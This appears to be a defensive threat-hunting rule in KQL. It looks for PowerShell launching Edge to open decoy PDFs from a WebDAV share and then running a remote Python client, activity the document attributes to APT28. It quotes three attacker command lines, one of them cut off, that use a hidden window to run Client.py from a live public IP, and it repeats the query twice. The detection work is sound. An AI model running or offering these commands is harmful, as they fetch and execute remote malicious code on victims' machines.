Hunt for external connections initiated by PowerShell to collect files from the webdav folder. This is used to download malicious files.
Example commandlines:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/231130N581.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/StrategyUa.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe
APT28 has gotten access to one of your devices and executes malicious payloads.
let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}';
DeviceProcessEvents
| where tolower(ProcessCommandLine) has_all ("start", "edge", "webdav")
| extend RemoteIP = extract(IPRegex, 0, ProcessCommandLine)
| where isnotempty(RemoteIP)
| where not(ipv4_is_private(RemoteIP))
| project-reorder DeviceName, RemoteIP, ProcessCommandLine, AccountUpn
let IPRegex = '[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}';
DeviceProcessEvents
| where tolower(ProcessCommandLine) has_all ("start", "edge", "webdav")
| extend RemoteIP = extract(IPRegex, 0, ProcessCommandLine)
| where isnotempty(RemoteIP)
| where not(ipv4_is_private(RemoteIP))
| project-reorder DeviceName, RemoteIP, ProcessCommandLine, AccountUpn